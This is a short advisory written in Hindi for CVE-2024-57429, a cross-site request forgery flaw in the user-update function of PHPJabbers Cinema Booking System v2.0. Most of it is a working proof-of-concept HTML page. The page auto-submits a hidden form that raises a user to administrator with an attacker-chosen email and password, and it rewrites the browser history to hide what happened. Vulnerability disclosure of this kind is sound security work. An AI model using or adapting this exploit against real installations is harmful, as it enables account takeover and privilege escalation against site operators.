
CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 CSRF के लिए असुरक्षित है, जिससे हमलावर एक व्यवस्थापक की ओर से अनुरोधों को जाली बनाकर विशेषाधिकार बढ़ा सकते हैं।
PHPJabbers Cinema Booking System v2.0 के pjActionUpdate फ़ंक्शन में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) कमजोरी है, जो दूरस्थ हमलावरों को एक प्रमाणित व्यवस्थापक को एक अनधिकृत अनुरोध प्रस्तुत करने के लिए धोखा देकर विशेषाधिकार बढ़ाने की अनुमति देती है।
इस CSRF कमजोरी का शोषण अनधिकृत कार्यों को जन्म दे सकता है, जैसे:
<html>
<!-- CSRF PoC - Update Admin User -->
<body>
<form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
<input type="hidden" name="user_update" value="1" />
<input type="hidden" name="id" value="3" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="newpassword123" />
<input type="hidden" name="name" value="Attacker" />
<input type="hidden" name="phone" value="1234567890" />
<input type="hidden" name="status" value="T" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>